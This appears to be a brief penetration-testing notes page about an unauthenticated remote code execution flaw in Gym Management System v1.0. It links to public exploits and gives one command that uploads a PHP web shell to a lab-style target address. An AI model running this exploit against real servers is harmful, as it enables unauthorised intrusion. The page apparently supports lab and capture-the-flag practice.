> For the complete documentation index, see [llms.txt](https://kashz.gitbook.io/kashz-jewels/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://kashz.gitbook.io/kashz-jewels/services/gym-management-system.md).

# gym management system

## v1.0 (unauthenticated RCE)

```bash
# linux os
https://github.com/ssMMiles/gym-management-unrestricted-upload
# uploads shell.php to target
$ python exploit.py -t 10.10.10.198:8080 -f shell.php

# windows os
https://www.exploit-db.com/exploits/48506
```
